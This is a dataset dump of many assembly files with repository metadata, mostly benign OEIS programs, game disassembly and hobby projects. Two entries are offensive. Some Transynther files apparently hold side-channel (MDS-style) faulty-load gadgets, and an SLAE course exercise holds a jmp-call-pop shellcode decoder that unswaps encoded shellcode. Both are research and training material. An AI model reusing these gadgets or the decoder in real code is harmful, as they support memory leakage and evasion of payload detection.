] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r14
push %r8
push %r9
push %rax
push %rbp
push %rdx
// Store
lea addresses_UC+0xbc35, %r8
clflush (%r8)
cmp %rbp, %rbp
mov $0x5152535455565758, %r11
movq %r11, %xmm7
movups %xmm7, (%r8)
nop
nop
add $17016, %r9
/... | 17.758621 | 122 | 0.64466 |
13d3f9989dad6f40c892c6cd5ac526f84de35703 | 642 | asm | Assembly | oeis/314/A314903.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/314/A314903.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/314/A314903.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A314903: Coordination sequence Gal.6.339.2 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings.
; Submitted by Jon Maiga
; 1,5,9,14,19,24,30,36,41,46,51,55,60,65,69,74,79,84,90,96,101,106,111,115,120,125,129,134,139,144,150,156,161,166,17... | 45.857143 | 182 | 0.73053 |
f041335063acde9bf222c575ea7a95e291e31b6c | 463 | asm | Assembly | oeis/289/A289896.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/289/A289896.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/289/A289896.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A289896: Number of (undirected) cycles in the n-triangular honeycomb rook graph.
; 0,0,1,8,45,242,1414,9432,72246,628260,6116319,65856928,776628203,9950798214,137612550620,2042588039056,32384583304092,546155914771464,9761655297881037,184309987662192600,3665514979650544153,76586509823743735706,1677182881414143407490
... | 38.583333 | 235 | 0.792657 |
7f4e6ff070e2caec56c10fd92022bbf9f0f435d9 | 111,666 | asm | Assembly | projects/Kirbys_Dream_Land_2.windfish/disassembly/bank_07.asm | jverkoey/awaken | 743755248996deb7181ae92f6e60be5656439c44 | [
"Apache-2.0"
] | 68 | 2020-12-16T10:06:48.000Z | 2022-03-29T19:54:01.000Z | projects/Kirbys_Dream_Land_2.windfish/disassembly/bank_07.asm | jverkoey/awaken | 743755248996deb7181ae92f6e60be5656439c44 | [
"Apache-2.0"
] | 62 | 2020-12-19T04:28:41.000Z | 2021-02-15T22:18:16.000Z | projects/Kirbys_Dream_Land_2.windfish/disassembly/bank_07.asm | jverkoey/awaken | 743755248996deb7181ae92f6e60be5656439c44 | [
"Apache-2.0"
] | 4 | 2021-01-17T03:51:22.000Z | 2021-01-21T16:26:53.000Z | SECTION "ROM Bank 07", ROMX[$4000], BANK[$07]
toc_07_4000:
assign [$DA3B], $01
assign [$DA3A], $02
ld hl, $DA3C
ld bc, $BC00
ld [hl], c
inc hl
ld [hl], b
xor a
ld hl, $DA30
ldi [hl], a
ld [hl], a
ld [$DA0E], a
ret
toc_07_401D:
ld hl, $D900
.l... | 29.510042 | 96 | 0.394838 |
dc5dbe3591c346628b156df30662e9e64ef095aa | 2,252 | asm | Assembly | Palmtree.Math.Core.Sint/vs_build/x64_Debug/pmc_statistics.asm | rougemeilland/Palmtree.Math.Core.Sint | 0895fd4988b146f01ec705e091ef3fd79a721b40 | [
"MIT"
] | null | null | null | Palmtree.Math.Core.Sint/vs_build/x64_Debug/pmc_statistics.asm | rougemeilland/Palmtree.Math.Core.Sint | 0895fd4988b146f01ec705e091ef3fd79a721b40 | [
"MIT"
] | null | null | null | Palmtree.Math.Core.Sint/vs_build/x64_Debug/pmc_statistics.asm | rougemeilland/Palmtree.Math.Core.Sint | 0895fd4988b146f01ec705e091ef3fd79a721b40 | [
"MIT"
] | null | null | null | ; Listing generated by Microsoft (R) Optimizing Compiler Version 19.16.27026.1
include listing.inc
INCLUDELIB MSVCRTD
INCLUDELIB OLDNAMES
_DATA SEGMENT
COMM uint_number_zero:QWORD
COMM uint_number_one:QWORD
_DATA ENDS
msvcjmc SEGMENT
__7B7A869E_ctype@h DB 01H
__457DD326_basetsd@h DB 01H
__4384A2D9_corecrt_memcpy_s@... | 22.979592 | 108 | 0.802842 |
98f4c10ab292131eb73c00fefc8a563a605564a4 | 94 | asm | Assembly | public/wintab/wintabx/pktunhk.asm | DannyParker0001/Kisak-Strike | 99ed85927336fe3aff2efd9b9382b2b32eb1d05d | [
"Unlicense"
] | 252 | 2020-12-16T15:34:43.000Z | 2022-03-31T23:21:37.000Z | cstrike15_src/public/wintab/wintabx/pktunhk.asm | bahadiraraz/Counter-Strike-Global-Offensive | 9a0534100cb98ffa1cf0c32e138f0e7971e910d3 | [
"MIT"
] | 23 | 2020-12-20T18:02:54.000Z | 2022-03-28T16:58:32.000Z | cstrike15_src/public/wintab/wintabx/pktunhk.asm | bahadiraraz/Counter-Strike-Global-Offensive | 9a0534100cb98ffa1cf0c32e138f0e7971e910d3 | [
"MIT"
] | 42 | 2020-12-19T04:32:33.000Z | 2022-03-30T06:00:28.000Z | include xlibproc.inc
include Wintab.inc
PROC_TEMPLATE WTMgrPacketUnhook, 1, Wintab, -, 204
| 23.5 | 51 | 0.787234 |
e3e527ca158913d22ca02baec131872c24cb2fec | 819 | asm | Assembly | oeis/142/A142033.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/142/A142033.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/142/A142033.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A142033: Primes congruent to 29 mod 31.
; Submitted by Jon Maiga
; 29,277,401,463,587,773,1021,1579,1889,1951,2137,2447,2633,2819,3067,3191,3253,4493,4679,5051,5113,5237,5857,5981,6043,6229,6353,6911,7159,7283,7717,7841,8089,8461,8647,9391,9887,9949,10259,10321,10631,11003,11251,11437,11933,12119,12491,12553,12739,13... | 35.608696 | 496 | 0.726496 |
777153fb0ceec9c6e66b56dd883c53a2f5677191 | 617 | a51 | Assembly | Tarefa 4/main44.a51 | raphaelmoletta/CSW40 | 69912ae95f283a6a6e3de0d501195ef5118d5cce | [
"MIT"
] | null | null | null | Tarefa 4/main44.a51 | raphaelmoletta/CSW40 | 69912ae95f283a6a6e3de0d501195ef5118d5cce | [
"MIT"
] | null | null | null | Tarefa 4/main44.a51 | raphaelmoletta/CSW40 | 69912ae95f283a6a6e3de0d501195ef5118d5cce | [
"MIT"
] | null | null | null | ; -----------------------------------------------------------------
; Programa para deslocamento dos leds
; ------------------------------------------------------------------
org 0000h
ACENDE:
CLR P3.6
acall delay
CLR P3.7
acall delay
CLR P1.4
acall delay
CPL P1.4
acall delay
CPL P3.7
acall delay
... | 16.675676 | 68 | 0.411669 |
0da6e1ba607c9918ed69215caf38327fd7af46c3 | 1,535 | asm | Assembly | GDRS.asm | Gabidal/GDR | 0786631f8789864431354637e298914ece0b7512 | [
"MIT"
] | null | null | null | GDRS.asm | Gabidal/GDR | 0786631f8789864431354637e298914ece0b7512 | [
"MIT"
] | null | null | null | GDRS.asm | Gabidal/GDR | 0786631f8789864431354637e298914ece0b7512 | [
"MIT"
] | null | null | null | section .text
[section .data]
layer4 dd 0, 3h
layer5 dd 0, 3h
layer6 dd 0, 3h
[section .code]
copy:
call Finish
pop eax
pop ecx
pop esi
pop edi
repz movsb
push eax
ret
put:
call Finish
pop eax
mov [layer4], eax
pop ecx
pop ebx ;offset
pop esi ;the ... | 15.505051 | 61 | 0.530293 |
a6515d6d769a1f37e1ebcaae09d6cc297281a2b1 | 34,224 | asm | Assembly | Palmtree.Math.Core.Implements/vs_build/x64_Release/pmc_compare.asm | rougemeilland/Palmtree.Math.Core.Implements | 52f4f6c765d16c9b0baf1fd212c61a33daae138c | [
"MIT"
] | null | null | null | Palmtree.Math.Core.Implements/vs_build/x64_Release/pmc_compare.asm | rougemeilland/Palmtree.Math.Core.Implements | 52f4f6c765d16c9b0baf1fd212c61a33daae138c | [
"MIT"
] | null | null | null | Palmtree.Math.Core.Implements/vs_build/x64_Release/pmc_compare.asm | rougemeilland/Palmtree.Math.Core.Implements | 52f4f6c765d16c9b0baf1fd212c61a33daae138c | [
"MIT"
] | null | null | null | ; Listing generated by Microsoft (R) Optimizing Compiler Version 19.16.27026.1
include listing.inc
INCLUDELIB MSVCRT
INCLUDELIB OLDNAMES
PUBLIC Compare_Imp
PUBLIC Initialize_Compare
PUBLIC PMC_Compare_I_X
PUBLIC PMC_Compare_L_X
PUBLIC PMC_Compare_X_I
PUBLIC PMC_Compare_X_L
PUBLIC PMC_Compare_X_X
EXTRN CheckNumber:P... | 21.868371 | 121 | 0.571412 |
0e335e31da4dd5f69e1185468b36f3d86d0e3930 | 17,029 | asm | Assembly | src/notepad.asm | jwse2/MijnOS | eaa280a5673604439a16575febc0ce342ba55f2e | [
"MIT"
] | null | null | null | src/notepad.asm | jwse2/MijnOS | eaa280a5673604439a16575febc0ce342ba55f2e | [
"MIT"
] | null | null | null | src/notepad.asm | jwse2/MijnOS | eaa280a5673604439a16575febc0ce342ba55f2e | [
"MIT"
] | null | null | null | [BITS 16]
; [ORG 0x15E00]
jmp main
;===============================================
; PREFIXES
; np = NotePad
; fn = FileName
;===============================================
%include "src\const.inc"
%define BUFFER_SIZE 512
text_buffer times BUFFER_SIZE db 0 ; Buffer the user writes to when pressi... | 20.034118 | 95 | 0.460685 |
1a8f778fb159e5a084d3671b8f8cf4555ee204e0 | 8,841 | asm | Assembly | tests/miaf/valid-exif.asm | gpac/ComplianceWarden | e6c73769bbe6531ef4a92d6853fa55bd49503d44 | [
"BSD-3-Clause"
] | 3 | 2020-01-02T17:30:16.000Z | 2021-09-27T18:32:18.000Z | tests/miaf/valid-exif.asm | gpac/ComplianceWarden | e6c73769bbe6531ef4a92d6853fa55bd49503d44 | [
"BSD-3-Clause"
] | 34 | 2020-01-22T01:41:22.000Z | 2021-12-09T13:20:33.000Z | tests/miaf/valid-exif.asm | gpac/ComplianceWarden | e6c73769bbe6531ef4a92d6853fa55bd49503d44 | [
"BSD-3-Clause"
] | 2 | 2020-11-05T01:41:08.000Z | 2021-11-19T13:12:35.000Z | %define BE(a) ( ((((a)>>24)&0xFF) << 0) + ((((a)>>16)&0xFF) << 8) + ((((a)>>8)&0xFF) << 16) + ((((a)>>0)&0xFF) << 24))
ftyp_start:
dd BE(ftyp_end - ftyp_start)
dd "ftyp"
db 0x61, 0x76, 0x69, 0x66 ; brand(32) ('avif')
db 0x00, 0x00, 0x00, 0x00 ; version(32)
db 0x6D, 0x69, 0x66, 0x31 ; compatible_... | 35.793522 | 309 | 0.518154 |
03cb49f4d3049162eec1fad0648d5a85a6e8100c | 4,074 | asm | Assembly | scripts/PokemonTower6F.asm | opiter09/ASM-Machina | 75d8e457b3e82cc7a99b8e70ada643ab02863ada | [
"CC0-1.0"
] | 1 | 2022-02-15T00:19:44.000Z | 2022-02-15T00:19:44.000Z | scripts/PokemonTower6F.asm | opiter09/ASM-Machina | 75d8e457b3e82cc7a99b8e70ada643ab02863ada | [
"CC0-1.0"
] | null | null | null | scripts/PokemonTower6F.asm | opiter09/ASM-Machina | 75d8e457b3e82cc7a99b8e70ada643ab02863ada | [
"CC0-1.0"
] | null | null | null | PokemonTower6F_Script:
call EnableAutoTextBoxDrawing
ld hl, PokemonTower6TrainerHeaders
ld de, PokemonTower6F_ScriptPointers
ld a, [wPokemonTower6FCurScript]
call ExecuteCurMapScriptInTable
ld [wPokemonTower6FCurScript], a
ret
PokemonTower6Script_60b02:
xor a
ld [wJoyIgnore], a
ld [wPokemonTower6FCurScript],... | 20.892308 | 133 | 0.827933 |
9135dfde4c3f3cef2442fadaa758253d3a40bf6c | 6,987 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_1552.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_1552.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_1552.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r15
push %r8
push %rax
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_A_ht+0x14e22, %rdx
nop
nop
nop
sub %r15, %r15
mov (%rdx), %bp
nop
nop
nop
xor %rdx, %rdx
lea addresses_UC_ht+0xab6a, %rax
nop
nop
nop
add $17395, %r10
movb (%rax), %r8b
nop... | 36.581152 | 2,999 | 0.657077 |
217f18880f2a37d6d5babc2252d8506865679039 | 467 | asm | Assembly | oeis/092/A092236.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/092/A092236.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/092/A092236.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A092236: a(n) = (3^n + 2*3^(n/2)*cos(n*Pi/6))/3.
; Submitted by Christian Krause
; 1,2,4,9,24,72,225,702,2160,6561,19764,59292,177633,532170,1595052,4782969,14346720,43040160,129127041,387400806,1162241784,3486784401,10460412252,31381236756,94143533121,282430067922,847289140884,2541865828329,7625595890664
lpb $0
s... | 23.35 | 225 | 0.67666 |
1587fdb83303d8747dc71737ff04e4beb40968fa | 174,727 | asm | Assembly | engine/battle/effect_commands.asm | AtmaBuster/pokeplat-gen2 | fa83b2e75575949b8f72cb2c48f7a1042e97f70f | [
"blessing"
] | 6 | 2021-06-19T06:41:19.000Z | 2022-02-15T17:12:33.000Z | engine/battle/effect_commands.asm | AtmaBuster/pokeplat-gen2 | fa83b2e75575949b8f72cb2c48f7a1042e97f70f | [
"blessing"
] | null | null | null | engine/battle/effect_commands.asm | AtmaBuster/pokeplat-gen2 | fa83b2e75575949b8f72cb2c48f7a1042e97f70f | [
"blessing"
] | 2 | 2021-08-11T19:47:07.000Z | 2022-01-01T07:07:56.000Z | SECTION "Effect Commands", ROMX
CompareMove:
; checks if the move ID in a matches the move in bc
push hl
call GetMoveIndexFromID
ld a, h
cp b
ld a, l
pop hl
ret nz
cp c
ret
GetOppUnderwaterAddr:
call BattleCommand_switchturn
call GetUserUnderwaterAddr
jp BattleCommand_switchturn
GetUserUnderwaterAddr:
... | 15.557564 | 186 | 0.73149 |
16e003cd967620e5af871dd202fd5e73458d183f | 1,093 | asm | Assembly | programs/oeis/277/A277975.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/277/A277975.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/277/A277975.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A277975: a(n) = n*x^n + (n-1)*x^(n-1) + . . . + x + 1 for x=5.
; 1,6,56,431,2931,18556,112306,659181,3784181,21362306,119018556,656127931,3585815431,19454956056,104904174806,562667846681,3004074096681,15974044799806,84638595581056,447034835815431,2354383468627931,12367963790893556,64820051193237306,339001417160034181... | 99.363636 | 962 | 0.885636 |
47b00d5a0286f8a4ce204191bef39a355204e68a | 1,097 | asm | Assembly | run/programs/print.asm | thecodewarrior/KotlinToyCPU | a3e6655efed5fa318d0354ace5141894d4f1176d | [
"MIT"
] | null | null | null | run/programs/print.asm | thecodewarrior/KotlinToyCPU | a3e6655efed5fa318d0354ace5141894d4f1176d | [
"MIT"
] | null | null | null | run/programs/print.asm | thecodewarrior/KotlinToyCPU | a3e6655efed5fa318d0354ace5141894d4f1176d | [
"MIT"
] | null | null | null | #include log.asm
; pcall PTEXT, PRINT_CHAR
; pcall PTEXT, PRINT_ASCIIZ
; pcall PTEXT, PRINT_FMT
println:
mov 0xA, r0
pcall PTEXT, PRINT_CHAR
mov lr, pc
print_hex:
mov r0, r1
shr r1, 28, r0
and r0, 0xf, r0
ldr'b r0 [:print_hex_digits, r0]
pcall PTEXT, PRINT_CHAR
shr r1, 24, r0
... | 18.913793 | 49 | 0.620784 |
59b1aae498c2a3574de466814809bc4e0f77000a | 810 | asm | Assembly | programs/oeis/214/A214062.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/214/A214062.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/214/A214062.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A214062: Least m>0 such that gcd(2*n+m, 2*n-1-m) > 1.
; 1,3,5,1,9,11,1,15,2,1,21,23,1,2,29,1,33,35,1,39,41,1,3,2,1,51,53,1,2,3,1,63,65,1,69,5,1,75,2,1,81,83,1,2,89,1,5,95,1,99,3,1,105,2,1,111,113,1,2,119,1,6,125,1,3,131,1,135,2,1,141,3,1,2,6,1,153,155,1,5,8,1,165,2,1,3,173,1,2,179,1,183,3,1,189,191,1,8,2,1,6,5,1,2,20... | 90 | 651 | 0.606173 |
1cdec7de71f3fc4498d2574a2bf3ca6bcf6691e8 | 1,851 | asm | Assembly | src/drivers/emulations/OPNOnOPNADual.asm | sharksym/vgmplay-sharksym | d7763b87a379da4e6dadcc55026969d310957952 | [
"BSD-2-Clause"
] | 6 | 2020-04-21T17:26:27.000Z | 2021-09-25T18:41:01.000Z | src/drivers/emulations/OPNOnOPNADual.asm | sharksym/vgmplay-sharksym | d7763b87a379da4e6dadcc55026969d310957952 | [
"BSD-2-Clause"
] | null | null | null | src/drivers/emulations/OPNOnOPNADual.asm | sharksym/vgmplay-sharksym | d7763b87a379da4e6dadcc55026969d310957952 | [
"BSD-2-Clause"
] | null | null | null | ;
; OPN on OPNA (2nd half) + PSG driver
;
OPNOnOPNADual_CLOCK: equ 3579545
OPNOnOPNADual: MACRO
super: Driver Device_noName, OPNOnOPNADual_CLOCK, OPNOnOPNADual_PrintInfoImpl
opnOnOPNADriver:
dw 0
psgDriver:
dw 0
; e = register
; d = value
SafeWriteRegister: PROC
ld a,e
cp 20H
jp c,System_Return
write... | 20.119565 | 78 | 0.778498 |
f751990d3a220a229369ddcc8bbc8abd93b4899f | 735 | asm | Assembly | 4/decoder.asm | 91fc7b/SLAE | 8ba0831963b077cb3739b8bb53ed430cd3b564e0 | [
"Unlicense"
] | null | null | null | 4/decoder.asm | 91fc7b/SLAE | 8ba0831963b077cb3739b8bb53ed430cd3b564e0 | [
"Unlicense"
] | null | null | null | 4/decoder.asm | 91fc7b/SLAE | 8ba0831963b077cb3739b8bb53ed430cd3b564e0 | [
"Unlicense"
] | null | null | null | global _start
section .text
_start:
jmp short call_shellcode
decoder:
pop esi ; now contains address of the encoded shellcode
xor ecx,ecx
mov cl,13 ;13 = 26/2, shellcode is decoded 2bytewise (swap)
decode:
;swap first byte (esi) and second byte (esi+1)
mov al,[esi] ;load first byte to al
inc esi
mov ah,... | 19.864865 | 151 | 0.72381 |
f78d6fb810075334ad26e1545ede2d1bbe6a5d29 | 2,621 | asm | Assembly | Zeus/constants.asm | Threetwosevensixseven/NirvanaPlusCalculator | 8fd671df0d4cc16f2b3544e6c5c24f67643a9f11 | [
"MIT"
] | null | null | null | Zeus/constants.asm | Threetwosevensixseven/NirvanaPlusCalculator | 8fd671df0d4cc16f2b3544e6c5c24f67643a9f11 | [
"MIT"
] | null | null | null | Zeus/constants.asm | Threetwosevensixseven/NirvanaPlusCalculator | 8fd671df0d4cc16f2b3544e6c5c24f67643a9f11 | [
"MIT"
] | null | null | null | ; Constants.asm
zoLogicOperatorsHighPri = false
zoSupportStringEscapes = false
Zeus_PC = NStart
Zeus_SP = NStart - 2
Zeus_StimDataErase = true
TOTAL_ROWS equ 23 ; 1..23
Red equ $52
White equ $7F
Cyan ... | 55.765957 | 127 | 0.539489 |
0c7ffc0acb677492033a2f6732c44e56baecd826 | 24,012 | asm | Assembly | vanilla/sound library 1.asm | PJBoy/SM-SPC | 1345e173d5239132870c0f84603778546de49633 | [
"0BSD"
] | 4 | 2019-11-28T19:12:09.000Z | 2022-02-04T20:51:06.000Z | vanilla/sound library 1.asm | PJBoy/SM-SPC | 1345e173d5239132870c0f84603778546de49633 | [
"0BSD"
] | null | null | null | vanilla/sound library 1.asm | PJBoy/SM-SPC | 1345e173d5239132870c0f84603778546de49633 | [
"0BSD"
] | null | null | null | ; $1EE4
goToProcessSound1:
{
jmp processSound1
}
; $1EE7
handleCpuIo1:
{
mov y,!cpuIo1_read_prev
mov a,!cpuIo1_read : mov !cpuIo1_read_prev,a
mov !cpuIo1_write,a
cmp y,!cpuIo1_read : bne .branch_change
.branch_noChange
mov a,!sound1 : bne goToProcessSound1
ret
.branch_change
cmp a,#$00 : beq .bran... | 28.93012 | 487 | 0.647093 |
8e03bece2e7c6a090608c69f66771b3d59102073 | 2,176 | asm | Assembly | Sources/Toggle_PP5_PWM_Buzzer_AssemProg.asm | billhhh/hcs12-dragon12 | 49341a48b06072c349fac074fe560de68dd00f22 | [
"MIT"
] | null | null | null | Sources/Toggle_PP5_PWM_Buzzer_AssemProg.asm | billhhh/hcs12-dragon12 | 49341a48b06072c349fac074fe560de68dd00f22 | [
"MIT"
] | null | null | null | Sources/Toggle_PP5_PWM_Buzzer_AssemProg.asm | billhhh/hcs12-dragon12 | 49341a48b06072c349fac074fe560de68dd00f22 | [
"MIT"
] | null | null | null | ;Toggling PP5 to sound the buzzer using PWM (pulse width modulation) on Dragon12 Plus Trainer Board
;The J26 jumper selection allows to SPK_SEL (speaker selection) to be PT5, PP5 (PWM chan 5) or DACB output
;When the Dragon12 board is shipped the J26 jumper is set for PT5 of PORTT speaker/buzzer selection (Default set... | 44.408163 | 119 | 0.622702 |
fbd02c9366ba62b4431a0d11d33222dd88457e6e | 663 | asm | Assembly | oeis/172/A172117.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/172/A172117.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/172/A172117.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A172117: a(n) = n*(n+1)*(20*n-17)/6.
; Submitted by Jamie Morken(s1.)
; 0,1,23,86,210,415,721,1148,1716,2445,3355,4466,5798,7371,9205,11320,13736,16473,19551,22990,26810,31031,35673,40756,46300,52325,58851,65898,73486,81635,90365,99696,109648,120241,131495,143430,156066,169423,183521,198380,214020,230461,247723,26582... | 47.357143 | 498 | 0.760181 |
cc8e82cb1b33aab5166ce2f7e530812879454dc4 | 608 | asm | Assembly | oeis/179/A179060.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/179/A179060.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/179/A179060.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A179060: Number of non-attacking placements of 5 rooks on an n X n board.
; 0,0,0,0,120,4320,52920,376320,1905120,7620480,25613280,75271680,198764280,480960480,1082161080,2289530880,4594961280,8809274880,16225246080,28844881920,49689816120,83217546720,135870624120,216790801920,338735628000,519241008000,782079948000,1... | 76 | 492 | 0.865132 |
087f27bd8daabec54ccaa02211c17d7c7729fd25 | 73 | asm | Assembly | gfx/pokemon/ampharos/anim_idle.asm | Dev727/ancientplatinum | 8b212a1728cc32a95743e1538b9eaa0827d013a7 | [
"blessing"
] | 28 | 2019-11-08T07:19:00.000Z | 2021-12-20T10:17:54.000Z | gfx/pokemon/ampharos/anim_idle.asm | Dev727/ancientplatinum | 8b212a1728cc32a95743e1538b9eaa0827d013a7 | [
"blessing"
] | 13 | 2020-01-11T17:00:40.000Z | 2021-09-14T01:27:38.000Z | gfx/pokemon/ampharos/anim_idle.asm | Dev727/ancientplatinum | 8b212a1728cc32a95743e1538b9eaa0827d013a7 | [
"blessing"
] | 22 | 2020-05-28T17:31:38.000Z | 2022-03-07T20:49:35.000Z | frame 4, 10
setrepeat 2
frame 5, 06
frame 6, 06
dorepeat 2
endanim
| 10.428571 | 12 | 0.684932 |
f28e9df07e34214cdace74379c20e3e1cb638a90 | 114 | asm | Assembly | libsrc/_DEVELOPMENT/math/float/math48/lm/c/sccz80/acosh.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 640 | 2017-01-14T23:33:45.000Z | 2022-03-30T11:28:42.000Z | libsrc/_DEVELOPMENT/math/float/math48/lm/c/sccz80/acosh.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 1,600 | 2017-01-15T16:12:02.000Z | 2022-03-31T12:11:12.000Z | libsrc/_DEVELOPMENT/math/float/math48/lm/c/sccz80/acosh.asm | jpoikela/z88dk | 7108b2d7e3a98a77de99b30c9a7c9199da9c75cb | [
"ClArtistic"
] | 215 | 2017-01-17T10:43:03.000Z | 2022-03-23T17:25:02.000Z |
SECTION code_clib
SECTION code_fp_math48
PUBLIC acosh
EXTERN cm48_sccz80_acosh
defc acosh = cm48_sccz80_acosh
| 11.4 | 30 | 0.850877 |
d54a1badb619a4563f238bf54dae006884b63348 | 198 | asm | Assembly | sway-core/tests/ir_to_asm/tiny_asm_block.asm | anrestbe/Bimbam | 11d4f534088e9272af1399cc8a0fe417f56af5a1 | [
"Apache-2.0"
] | 1 | 2022-02-01T19:57:26.000Z | 2022-02-01T19:57:26.000Z | sway-core/tests/ir_to_asm/tiny_asm_block.asm | anrestbe/Bimbam | 11d4f534088e9272af1399cc8a0fe417f56af5a1 | [
"Apache-2.0"
] | null | null | null | sway-core/tests/ir_to_asm/tiny_asm_block.asm | anrestbe/Bimbam | 11d4f534088e9272af1399cc8a0fe417f56af5a1 | [
"Apache-2.0"
] | null | null | null | .program:
ji i4
noop
DATA_SECTION_OFFSET[0..32]
DATA_SECTION_OFFSET[32..64]
lw $ds $is 1
add $$ds $$ds $is
bhei $r0
move $r1 $r0 ; return value from inline asm
ret $r1
.data:
| 16.5 | 60 | 0.621212 |
abcbb55bc838f401667eba2678e71f8b273dbfef | 973 | asm | Assembly | Altair101/asm/programsUntested/opOutLcdOffOn.asm | tigerfarm/arduino | e51f111a092fe6737646b146a825f4eecbd05d44 | [
"OLDAP-2.4",
"OLDAP-2.7"
] | 2 | 2021-12-12T23:27:10.000Z | 2022-02-17T14:01:21.000Z | Altair101/asm/programsUntested/opOutLcdOffOn.asm | tigerfarm/arduino | e51f111a092fe6737646b146a825f4eecbd05d44 | [
"OLDAP-2.4",
"OLDAP-2.7"
] | null | null | null | Altair101/asm/programsUntested/opOutLcdOffOn.asm | tigerfarm/arduino | e51f111a092fe6737646b146a825f4eecbd05d44 | [
"OLDAP-2.4",
"OLDAP-2.7"
